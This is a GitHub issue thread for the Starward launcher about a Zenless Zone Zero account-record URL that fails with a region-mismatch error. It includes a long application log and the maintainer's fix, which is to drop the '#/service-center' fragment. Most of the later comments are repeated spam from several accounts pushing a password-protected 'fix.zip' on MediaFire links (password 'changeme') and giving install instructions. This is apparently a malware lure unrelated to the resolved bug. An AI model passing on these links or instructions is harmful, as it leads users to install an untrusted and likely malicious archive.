### ISSUE TITLE
[Bug] 绝区零账号记录显示区域不匹配

### ISSUE THREAD

**Issue by xxbhpan** [Scighost/Starward#1048]
### Checklist

- [X] My issue was not mentioned by others, and it is not a duplicate issue.

### Description

绝区零账号记录显示区域不匹配
URL (部分)：https://webstatic.mihoyo.com/csc-service-center-fe/index.html?sign_type=2&auth_appid=csc&authkey_ver=1&win_direction=portrait&login_type=account&page_id=15&goToHall=true&plat_type=pc&game_version=CNPRODWin1.1.0&device_model=82JD%20(LENOVO)&authkey=**(隐私部分)**&lang=zh-cn&region=prod_gf_cn&game_biz=nap_cn#/service-center)
URL部分非隐私信息：
游戏版本 “game_version=CNPRODWin1.1.0”
设备 联想拯救者Y9000P2021H “device_model=82JD%20(LENOVO)”

### Reproduction Steps

1、打开绝区零游戏内反馈
2、复制URL到账号记录
3、错误出现

### Screenshots

<img width="684" alt="20240825214230" src="https://github.com/user-attachments/assets/7f9d09d2-5b21-45b4-9567-b44848775e6e">
<img width="491" alt="20240825214245" src="https://github.com/user-attachments/assets/f5e87f3f-752c-491b-9bd5-8714717e3236">

### Starward Version

0.12.2 Preview 3

### Windows Version

19044.4651

### Log

```shell
[21:28:35.593] [INFO] 
Welcome to Starward v0.12.2-preview.3
System: Microsoft Windows NT 10.0.19044.0
Command Line: D:\miHoYo\Tools\Starward\app-0.12.2-preview.3\Starward.dll

[21:28:35.619] [INFO] Starward.Services.DatabaseService
Database path is 'D:\miHoYo\Tools\Starward'

[21:28:35.643] [INFO] Starward.Services.DatabaseService
Database version is 10, target version is 10.

[21:28:35.701] [INFO] Starward.Pages.MainPage
Last game region is hk4e_cn

[21:28:35.711] [INFO] Starward.Pages.MainPage
Navigate to "GameLauncherPage" with param hk4e_cn

[21:28:36.318] [INFO] Starward.Pages.GameLauncherPage
Game install path of hk4e_cn: "C:\ProgramMy\Genshin Impact\Genshin Impact Game"

[21:28:36.335] [INFO] Starward.Pages.GameLauncherPage
Acutal version and gamebiz of hk4e_cn is "4.8.0".

[21:28:37.282] [INFO] Starward.Services.UpdateService
Start to check update (Preview: True, Arch: X64)

[21:28:37.659] [INFO] Starward.Pages.MainPage
Navigate to "SelfQueryPage" with param hk4e_cn

[21:28:38.364] [INFO] Starward.Services.UpdateService
Current version: "0.12.2-preview.3", latest version: "0.12.2-preview.3", ignore version: null

[21:28:41.112] [INFO] Starward.Pages.MainPage
Navigate to "HoyolabToolboxPage" with param hk4e_cn

[21:28:41.122] [INFO] Starward.Services.GameRecordService
Change region to China.

[21:28:46.287] [INFO] Starward.Pages.MainPage
Navigate to "SelfQueryPage" with param hk4e_cn

[21:29:37.447] [INFO] Starward.Pages.MainPage
Navigate to "GameLauncherPage" with param hk4e_cn

[21:29:37.510] [INFO] Starward.Pages.GameLauncherPage
Game install path of hk4e_cn: "C:\ProgramMy\Genshin Impact\Genshin Impact Game"

[21:29:37.540] [INFO] Starward.Pages.GameLauncherPage
Acutal version and gamebiz of hk4e_cn is "4.8.0".

[21:29:38.286] [INFO] Starward.Pages.MainPage
Navigate to "SelfQueryPage" with param hk4e_cn

[21:29:48.584] [INFO] Starward.Pages.MainPage
Navigate to "HoyolabToolboxPage" with param hk4e_cn

[21:29:48.592] [INFO] Starward.Services.GameRecordService
Change region to China.

[21:30:04.797] [INFO] Starward.Pages.MainPage
Change game region to hkrpg_cn

[21:30:04.798] [INFO] Starward.Pages.MainPage
Navigate to "HoyolabToolboxPage" with param hkrpg_cn

[21:30:04.804] [INFO] Starward.Services.GameRecordService
Change region to China.

[21:30:31.925] [INFO] Starward.Pages.MainPage
Navigate to "SelfQueryPage" with param hkrpg_cn

[21:30:37.975] [INFO] Starward.Pages.MainPage
Change game region to hk4e_cn

[21:30:37.975] [INFO] Starward.Pages.MainPage
Navigate to "SelfQueryPage" with param hk4e_cn

[21:30:39.821] [INFO] Starward.Pages.MainPage
Navigate to "HoyolabToolboxPage" with param hk4e_cn

[21:30:39.827] [INFO] Starward.Services.GameRecordService
Change region to China.

[21:30:57.126] [INFO] Starward.Pages.MainPage
Navigate to "GameLauncherPage" with param hk4e_cn

[21:30:57.197] [INFO] Starward.Pages.GameLauncherPage
Game install path of hk4e_cn: "C:\ProgramMy\Genshin Impact\Genshin Impact Game"

[21:30:57.227] [INFO] Starward.Pages.GameLauncherPage
Acutal version and gamebiz of hk4e_cn is "4.8.0".

[21:31:00.053] [INFO] Starward.Pages.MainPage
Change game region to nap_cn

[21:31:00.054] [INFO] Starward.Pages.MainPage
Navigate to "GameLauncherPage" with param nap_cn

[21:31:00.129] [INFO] Starward.Pages.GameLauncherPage
Game install path of nap_cn: "C:\ProgramMy\ZenlessZoneZero\ZenlessZoneZero Game"

[21:31:00.156] [INFO] Starward.Pages.GameLauncherPage
Acutal version and gamebiz of nap_cn is "1.1.0".

[21:31:55.440] [INFO] Starward.Services.Launcher.GameLauncherService
Start game (nap_cn)
path: "C:\ProgramMy\ZenlessZoneZero\ZenlessZoneZero Game\ZenlessZoneZero.exe"
arg: null

[21:31:55.469] [INFO] Starward.Pages.GameLauncherPage
Game started ("ZenlessZoneZero", 19596)

[21:31:57.481] [INFO] Starward.Services.PlayTimeService
Start to log playtime (nap_cn, 19596)

[21:32:58.284] [INFO] Starward.Pages.MainPage
Navigate to "ScreenshotPage" with param nap_cn

[21:32:58.404] [INFO] Starward.Pages.ScreenshotPage
Screenshot folder is "C:\ProgramMy\ZenlessZoneZero\ZenlessZoneZero Game\ScreenShot"

[21:32:58.958] [INFO] Starward.Pages.MainPage
Navigate to "GachaLogPage" with param nap_cn

[21:33:00.112] [INFO] Starward.Pages.MainPage
Navigate to "GameSettingPage" with param nap_cn

[21:33:32.982] [INFO] Starward.Pages.MainPage
Change game region to hk4e_cn

[21:33:32.983] [INFO] Starward.Pages.MainPage
Navigate to "GameSettingPage" with param hk4e_cn

[21:33:34.191] [INFO] Starward.Pages.MainPage
Change game region to hkrpg_cn

[21:33:34.191] [INFO] Starward.Pages.MainPage
Navigate to "GameSettingPage" with param hkrpg_cn

[21:33:35.058] [INFO] Starward.Pages.MainPage
Change game region to nap_cn

[21:33:35.059] [INFO] Starward.Pages.MainPage
Navigate to "GameSettingPage" with param nap_cn

[21:33:36.136] [INFO] Starward.Pages.MainPage
Change game region to hk4e_cloud

[21:33:36.137] [INFO] Starward.Pages.MainPage
Navigate to "GameSettingPage" with param hk4e_cloud

[21:33:36.171] [WARN] Starward.Services.GameResourceService
config.ini not found: "C:\ProgramMy\Genshin Impact Cloud Game\config.ini"

[21:33:36.863] [INFO] Starward.Pages.MainPage
Change game region to nap_cn

[21:33:36.864] [INFO] Starward.Pages.MainPage
Navigate to "GameSettingPage" with param nap_cn

[21:33:38.634] [INFO] Starward.Pages.MainPage
Navigate to "GameLauncherPage" with param nap_cn

[21:33:38.697] [INFO] Starward.Pages.GameLauncherPage
Game install path of nap_cn: "C:\ProgramMy\ZenlessZoneZero\ZenlessZoneZero Game"

[21:33:38.714] [INFO] Starward.Pages.GameLauncherPage
Acutal version and gamebiz of nap_cn is "1.1.0".

[21:33:39.473] [INFO] Starward.Pages.MainPage
Navigate to "SelfQueryPage" with param nap_cn

[21:33:40.492] [INFO] Starward.Pages.MainPage
Navigate to "GameLauncherPage" with param nap_cn

[21:33:40.554] [INFO] Starward.Pages.GameLauncherPage
Game install path of nap_cn: "C:\ProgramMy\ZenlessZoneZero\ZenlessZoneZero Game"

[21:33:40.575] [INFO] Starward.Pages.GameLauncherPage
Acutal version and gamebiz of nap_cn is "1.1.0".

[21:33:47.981] [INFO] Starward.Services.Launcher.GameLauncherService
Start game (nap_cn)
path: "C:\ProgramMy\ZenlessZoneZero\ZenlessZoneZero Game\ZenlessZoneZero.exe"
arg: null

[21:33:48.002] [INFO] Starward.Pages.GameLauncherPage
Game started ("ZenlessZoneZero", 13080)

[21:33:50.012] [INFO] Starward.Services.PlayTimeService
Start to log playtime (nap_cn, 13080)

[21:34:06.377] [INFO] Starward.Pages.MainPage
Navigate to "GameSettingPage" with param nap_cn

[21:34:30.142] [INFO] Starward.Pages.MainPage
Navigate to "GameLauncherPage" with param nap_cn

[21:34:30.198] [INFO] Starward.Pages.GameLauncherPage
Game install path of nap_cn: "C:\ProgramMy\ZenlessZoneZero\ZenlessZoneZero Game"

[21:34:30.220] [INFO] Starward.Pages.GameLauncherPage
Acutal version and gamebiz of nap_cn is "1.1.0".

[21:34:31.144] [INFO] Starward.Services.Launcher.GameLauncherService
Start game (nap_cn)
path: "C:\ProgramMy\ZenlessZoneZero\ZenlessZoneZero Game\ZenlessZoneZero.exe"
arg: null

[21:34:31.175] [INFO] Starward.Pages.GameLauncherPage
Game started ("ZenlessZoneZero", 18076)

[21:34:33.184] [INFO] Starward.Services.PlayTimeService
Start to log playtime (nap_cn, 18076)

[21:34:49.604] [INFO] Starward.Pages.MainPage
Navigate to "GameSettingPage" with param nap_cn

[21:34:50.807] [INFO] Starward.Pages.MainPage
Navigate to "GameLauncherPage" with param nap_cn

[21:34:50.874] [INFO] Starward.Pages.GameLauncherPage
Game install path of nap_cn: "C:\ProgramMy\ZenlessZoneZero\ZenlessZoneZero Game"

[21:34:50.880] [INFO] Starward.Pages.GameLauncherPage
Game is running ("ZenlessZoneZero", 18076)

[21:34:50.894] [INFO] Starward.Pages.GameLauncherPage
Acutal version and gamebiz of nap_cn is "1.1.0".

[21:41:21.203] [INFO] Starward.Pages.MainPage
Navigate to "SelfQueryPage" with param nap_cn

[21:41:23.372] [EROR] Starward.Pages.SelfQueryPage
Input url
System.ArgumentException: Input url doesn't match the game region (nap_cn). (Parameter 'url')
   at Starward.Core.SelfQuery.SelfQueryClient.InitializeAsync(String url, GameBiz gameBiz, CancellationToken cancellationToken) in D:\a\Starward\Starward\src\Starward.Core\SelfQuery\SelfQueryClient.cs:line 70
   at Starward.Services.SelfQueryService.InitializeAsync(String url, GameBiz gameBiz) in D:\a\Starward\Starward\src\Starward\Services\SelfQueryService.cs:line 40
   at Starward.Pages.SelfQueryPage.InputURLAsync() in D:\a\Starward\Starward\src\Starward\Pages\SelfQueryPage.xaml.cs:line 340

[21:41:31.392] [EROR] Starward.Pages.SelfQueryPage
Input url
System.ArgumentException: Input url doesn't match the game region (nap_cn). (Parameter 'url')
   at Starward.Core.SelfQuery.SelfQueryClient.InitializeAsync(String url, GameBiz gameBiz, CancellationToken cancellationToken) in D:\a\Starward\Starward\src\Starward.Core\SelfQuery\SelfQueryClient.cs:line 70
   at Starward.Services.SelfQueryService.InitializeAsync(String url, GameBiz gameBiz) in D:\a\Starward\Starward\src\Starward\Services\SelfQueryService.cs:line 40
   at Starward.Pages.SelfQueryPage.InputURLAsync() in D:\a\Starward\Starward\src\Starward\Pages\SelfQueryPage.xaml.cs:line 340

[21:41:39.528] [INFO] Starward.Pages.MainPage
Navigate to "GachaLogPage" with param nap_cn

[21:41:40.351] [INFO] Starward.Pages.MainPage
Navigate to "SelfQueryPage" with param nap_cn

[21:41:48.681] [EROR] Starward.Pages.SelfQueryPage
Input url
System.ArgumentException: Input url doesn't match the game region (nap_cn). (Parameter 'url')
   at Starward.Core.SelfQuery.SelfQueryClient.InitializeAsync(String url, GameBiz gameBiz, CancellationToken cancellationToken) in D:\a\Starward\Starward\src\Starward.Core\SelfQuery\SelfQueryClient.cs:line 70
   at Starward.Services.SelfQueryService.InitializeAsync(String url, GameBiz gameBiz) in D:\a\Starward\Starward\src\Starward\Services\SelfQueryService.cs:line 40
   at Starward.Pages.SelfQueryPage.InputURLAsync() in D:\a\Starward\Starward\src\Starward\Pages\SelfQueryPage.xaml.cs:line 340

[21:42:38.265] [EROR] Starward.Pages.SelfQueryPage
Input url
System.ArgumentException: Input url doesn't match the game region (nap_cn). (Parameter 'url')
   at Starward.Core.SelfQuery.SelfQueryClient.InitializeAsync(String url, GameBiz gameBiz, CancellationToken cancellationToken) in D:\a\Starward\Starward\src\Starward.Core\SelfQuery\SelfQueryClient.cs:line 70
   at Starward.Services.SelfQueryService.InitializeAsync(String url, GameBiz gameBiz) in D:\a\Starward\Starward\src\Starward\Services\SelfQueryService.cs:line 40
   at Starward.Pages.SelfQueryPage.InputURLAsync() in D:\a\Starward\Starward\src\Starward\Pages\SelfQueryPage.xaml.cs:line 340
```

**Comment by Scighost** [comment]
井号#及后面的内容 `#/service-center)` 在粘贴时不需要

**Comment by xxbhpan** [comment]
> 井号#及后面的内容 `#/service-center)` 在粘贴时不需要

OK，进过操作，已经可以获取到相关数据。谢谢大大！

**Comment by mabhi02** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by mabhi02** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by mabhi02** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by FoioMikael** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by xxbhpan** [comment]
> to fix your trouble try download this fix, i see it in another issue, https://app.mediafire.com/3ag3jpquii3of password: changeme when you installing, you need to place a check in install to path and select "gcc."

My related issues have already been resolved by the developers @Scighost . Thank you for your kindness. I would be even happier if you do not send any more related messages.

**Comment by Satyam1Deepu** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
